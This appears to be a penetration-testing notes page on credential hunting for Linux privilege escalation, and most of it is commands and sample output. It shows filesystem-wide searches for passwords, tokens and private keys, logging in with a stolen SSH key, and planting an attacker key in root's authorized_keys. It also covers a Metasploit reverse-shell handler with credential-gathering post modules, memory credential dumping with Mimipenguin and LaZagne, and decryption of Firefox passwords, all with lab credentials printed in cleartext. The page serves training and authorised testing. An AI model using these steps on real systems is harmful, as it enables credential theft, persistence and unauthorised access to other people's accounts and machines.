# Credentials Hunting | **`Files`** | **`History`** | **`Memory`** | **`Key-Rings`** | | ------------ | -------------------- | -------------------- | -------------------------- | | Configs | Logs | Cache | Browser stored credentials | | Databases | Command-line History | In-memory Processing | | | Notes | | | | | Scripts | | | | | Source codes | | | | | Cronjobs | | | | | SSH Keys | | | | {% hint style="info" %} Note down any credentials. These may be found in configuration files (`.conf`, `.config`, `.xml`, etc.), shell scripts, a user's bash history file, backup (`.bak`) files, within database files or even in text files. {% endhint %} {% content-ref url="/pages/tNOx4mmWWtcIlYUuzT8m" %} [Broken mention](broken://pages/tNOx4mmWWtcIlYUuzT8m) {% endcontent-ref %} ## Files | | | | | ------------------- | --------- | -------- | | Configuration files | Databases | Notes | | Scripts | Cronjobs | SSH keys | ### All in one ``` grep -r -i -E "config|password|ini|passwd|pwd|hash|hashed|secret|key|token|credentials|auth|ssh|mysql|postgres|dbpass|db_password|dbuser|db_user|passwd|password|pwd|hash|hashed|secret|key|token|credentials|auth|ssh|mysql|postgres|dbpass|db_password|dbuser|db_user" / 2>/dev/null ``` And ``` find / -type f $ -iname "*config*" -o -iname "*password*" -o -iname "*ini*" -o -iname "*passwd*" -o -iname "*pwd*" -o -iname "*hash*" -o -iname "*hashed*" -o -iname "*secret*" -o -iname "*key*" -o -iname "*token*" -o -iname "*credentials*" -o -iname "*auth*" -o -iname "*ssh*" -o -iname "*mysql*" -o -iname "*postgres*" -o -iname "*dbpass*" -o -iname "*db_password*" -o -iname "*dbuser*" -o -iname "*db_user*" -o -iname "*.conf" -o -iname "*.cfg" -o -iname "*.ini" -o -iname "*.env" -o -iname "*.properties" -o -iname "*.json" -o -iname "*.yaml" -o -iname "*.yml" -o -iname "*.xml" -o -iname "*.sh" -o -iname "*.py" -o -iname "*.php" $ 2>/dev/null ``` ### Configuration Files ```shell-session for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done ``` #### **Credentials in config files:** We search for three words (`user`, `password`, `pass`) in each file with the file extension `.cnf` ```shell-session for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done ``` #### /var

cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'

define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', 'WPadmin123!' );

#### Spool or mail directories ```shell-session find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/python3/debian_config /etc/kbd/config /etc/manpath.config /boot/config-4.4.0-116-generic /boot/grub/i386-pc/configfile.mod /sys/devices/pci0000:00/0000:00:00.0/config /sys/devices/pci0000:00/0000:00:01.0/config ``` #### **Hiting for files** ```shell-session $ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done File extension: .xls File extension: .xls* File extension: .xltx File extension: .csv /home/cry0l1t3/Docs/client-emails.csv /home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header-label.csv /home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header.csv /home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/no-header.csv /home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/plus.csv /home/cry0l1t3/ruby-2.7.3/test/win32ole/orig_data.csv File extension: .od* /home/cry0l1t3/Docs/document-temp.odt /home/cry0l1t3/Docs/product-improvements.odp /home/cry0l1t3/Docs/mgmt-spreadsheet.ods ...SNIP... ``` Encrypted Files : {% content-ref url="/pages/hgeuI1hjFgGFVwV26pUi" %} [Files - Encrypted](/0xss0rz/pentest/cracking/files-encrypted.md) {% endcontent-ref %} #### **Find files** ```shell-session $ find /mnt/Finance/ -name *cred* /mnt/Finance/Contracts/private/credentials.txt ``` #### **Grep for credz** ```shell-session $ grep -rn /mnt/Finance/ -ie cred /mnt/Finance/Contracts/private/credentials.txt:1:admin:SecureCredentials! /mnt/Finance/Contracts/private/secret.txt:1:file with all credentials ``` ### Databases ```shell-session for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done ``` See [Credentials in config files](#credentials-in-config-files) to search for creds ### Notes ```shell-session find /home/* -type f -name "*.txt" -o ! -name "*.*" ``` ### Scripts ```shell-session for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done ``` ### Cronjobs ```shell-session cat /etc/crontab ``` ```shell-session ls -la /etc/cron.*/ ``` ### SSH Keys ```shell-session grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" ``` {% hint style="info" %} Whenever finding SSH keys check the `known_hosts` file to find targets. This file contains a list of public keys for all the hosts which the user has connected to in the past and may be useful for lateral movement or to find data on a remote host that can be used to perform privilege escalation on our target. {% endhint %} ```shell-session ls ~/.ssh id_rsa id_rsa.pub known_hosts ``` If we have read access over the `.ssh` directory for a specific user, we may read their private ssh keys found in `/home/user/.ssh/id_rsa` or `/root/.ssh/id_rsa`, and use it to log in to the server. If we can read the `/root/.ssh/` directory and can read the `id_rsa` file, we can copy it to our machine and use the `-i` flag to log in with it:

```shell-session 0xss0rz@htb[/htb]$ vim id_rsa 0xss0rz@htb[/htb]$ chmod 600 id_rsa 0xss0rz@htb[/htb]$ ssh user@10.10.10.10 -i id_rsa root@remotehost# ``` If we find ourselves with write access to a users`/.ssh/` directory, we can place our public key in the user's ssh directory at `/home/user/.ssh/authorized_keys`. {% content-ref url="/pages/cdMRkT576oK23pkFDa9R" %} [SSH (22)](/0xss0rz/pentest/protocols/ssh-22.md) {% endcontent-ref %} ```shell-session ssh-keygen -f key Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): ******* Enter same passphrase again: ******* Your identification has been saved in key Your public key has been saved in key.pub The key fingerprint is: SHA256:...SNIP... user@parrot The key's randomart image is: +---[RSA 3072]----+ | ..o.++.+ | ...SNIP... | . ..oo+. | +----[SHA256]-----+ ``` Let us copy `key.pub`, then on the remote machine, we will add it into `/root/.ssh/authorized_keys`: ```shell-session user@remotehost$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys ``` Now, the remote server should allow us to log in as that user by using our private key: ```shell-session 0xss0rz@htb[/htb]$ ssh root@10.10.10.10 -i key root@remotehost# ``` #### With Metasploit: ``` msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD linux/x86/shell_reverse_tcp payload => linux/x86/shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.1.101 lhost => 192.168.1.101 msf exploit(handler) > set LPORT 443 lport => 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.101:37059) at 2011-06-02 11:06:02 -0600 id uid=0(root) gid=0(root) groups=0(root) ^Z Background session 1? [y/N] y msf exploit(handler) > use post/multi/gather/ssh_creds msf post(ssh_creds) > show options Module options (post/multi/gather/ssh_creds): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. msf post(ssh_creds) > set SESSION 1 session => 1 msf post(ssh_creds) > run [*] Determining session platform and type... [*] Checking for OpenSSH profile in: /bin/.ssh [-] OpenSSH profile not found in /bin/.ssh [*] Checking for OpenSSH profile in: /dev/.ssh …snip… [-] OpenSSH profile not found in /var/www/.ssh [+] Downloading /root/.ssh/authorized_keys [+] Downloading /root/.ssh/authorized_keys2 [+] Downloading /root/.ssh/id_rsa [+] Downloading /root/.ssh/id_rsa.pub [+] Downloading /root/.ssh/known_hosts [+] Downloading /usr/NX/home/nx/.ssh/authorized_keys2 [+] Downloading /usr/NX/home/nx/.ssh/default.id_dsa.pub [+] Downloading /usr/NX/home/nx/.ssh/known_hosts [+] Downloading /usr/NX/home/nx/.ssh/restore.id_dsa.pub [*] Post module execution completed msf post(ssh_creds) > ``` Source: {% embed url="" %} ## **EvilTree - Regex** {% embed url="" %} * Regex to look for passwords: `-x ".{0,3}passw.{0,3}[=]{1}.{0,18}"` * Keywords to look for sensitive info: `-k passw,db_,admin,account,user,token` ``` python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -i -v -q -L 3 python3 eviltree.py -r / -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -i -v -q -A -f -L 3 ```

## Bash History In the history of the commands entered on Linux distributions that use Bash as a standard shell, we find the associated files in `.bash_history`. Nevertheless, other files like `.bashrc` or `.bash_profile` can contain important information. ```shell-session $ tail -n5 /home/*/.bash* ==> /home/cry0l1t3/.bash_history <== vim ~/testing.txt vim ~/testing.txt chmod 755 /tmp/api.py su /tmp/api.py cry0l1t3 6mX4UP1eWH3HXK ==> /home/cry0l1t3/.bashrc <== . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ]; then . /etc/bash_completion fi fi ``` ### Logs | **Log File** | **Description** | | --------------------- | -------------------------------------------------- | | `/var/log/messages` | Generic system activity logs. | | `/var/log/syslog` | Generic system activity logs. | | `/var/log/auth.log` | (Debian) All authentication related logs. | | `/var/log/secure` | (RedHat/CentOS) All authentication related logs. | | `/var/log/boot.log` | Booting information. | | `/var/log/dmesg` | Hardware and drivers related information and logs. | | `/var/log/kern.log` | Kernel related warnings, errors and logs. | | `/var/log/faillog` | Failed login attempts. | | `/var/log/cron` | Information related to cron jobs. | | `/var/log/mail.log` | All mail server related logs. | | `/var/log/httpd` | All Apache related logs. | | `/var/log/mysqld.log` | All MySQL server related logs. | ```shell-session for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done ``` Apache logs: ``` /var/log/apache2/access.log /var/log/httpd/access_log /var/log/apache2/error.log /var/log/httpd/error_log ``` ## Memory ### Mimipenguin {% embed url="" %} ```shell-session $ sudo python3 mimipenguin.py [sudo] password for cry0l1t3: [SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY $ sudo bash mimipenguin.sh [sudo] password for cry0l1t3: MimiPenguin Results: [SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY ``` ### **LaZagne** {% embed url="" %} ```shell-session $ sudo python2.7 laZagne.py all |====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| ------------------- Shadow passwords ----------------- [+] Hash found !!! Login: systemd-coredump Hash: !!:18858:::::: [+] Hash found !!! Login: sambauser Hash: $6$wgK4tGq7Jepa.V0g$QkxvseL.xkC3jo682xhSGoXXOGcBwPLc2CrAPugD6PYXWQlBkiwwFs7x/fhI.8negiUSPqaWyv7wC8uwsWPrx1:18862:0:99999:7::: [+] Password found !!! Login: cry0l1t3 Password: WLpAEXFa0SbqOHY [+] 3 passwords have been found. For more information launch it again with the -v option elapsed time = 3.50091600418 ``` ### Linikatz V2 {% embed url="" %} ### Browsers - All {% embed url="" %} ### Browsers - Firefox ```shell-session ls -l .mozilla/firefox/ | grep default drwx------ 11 cry0l1t3 cry0l1t3 4096 Jan 28 16:02 1bplpd86.default-release drwx------ 2 cry0l1t3 cry0l1t3 4096 Jan 28 13:30 lfx3lvhb.default ``` ```shell-session $ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . { "nextId": 2, "logins": [ { "id": 1, "hostname": "https://www.inlanefreight.com", "httpRealm": null, "formSubmitURL": "https://www.inlanefreight.com", "usernameField": "username", "passwordField": "password", "encryptedUsername": "MDoEEPgAAAA...SNIP...1liQiqBBAG/8/UpqwNlEPScm0uecyr", "encryptedPassword": "MEIEEPgAAAA...SNIP...FrESc4A3OOBBiyS2HR98xsmlrMCRcX2T9Pm14PMp3bpmE=", "guid": "{412629aa-4113-4ff9-befe-dd9b4ca388e2}", "encType": 1, "timeCreated": 1643373110869, "timeLastUsed": 1643373110869, "timePasswordChanged": 1643373110869, "timesUsed": 1 } ], "potentiallyVulnerablePasswords": [], "dismissedBreachAlertsByLoginGUID": {}, "version": 3 } ``` Decrypt: {% embed url="" %} ```shell-session $ python3.9 firefox_decrypt.py Select the Mozilla profile you wish to decrypt 1 -> lfx3lvhb.default 2 -> 1bplpd86.default-release 2 Website: https://testing.dev.inlanefreight.com Username: 'test' Password: 'test' Website: https://www.inlanefreight.com Username: 'cry0l1t3' Password: 'FzXUxJemKm6g2lGh' ``` Or with Lazagne ```shell-session $ python3 laZagne.py browsers |====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| ------------------- Firefox passwords ----------------- [+] Password found !!! URL: https://testing.dev.inlanefreight.com Login: test Password: test [+] Password found !!! URL: https://www.inlanefreight.com Login: cry0l1t3 Password: FzXUxJemKm6g2lGh [+] 2 passwords have been found. For more information launch it again with the -v option elapsed time = 0.2310788631439209 ``` Or Netexec - CME module firefox ``` Apr 09, 2024 - 08:28:05 (EDT)] exegol-CPTS /workspace # cme smb -L [*] firefox Dump credentials from Firefox ``` Or Metasploit ``` meterpreter > run post/multi/gather/firefox_creds ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/credentials-hunting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.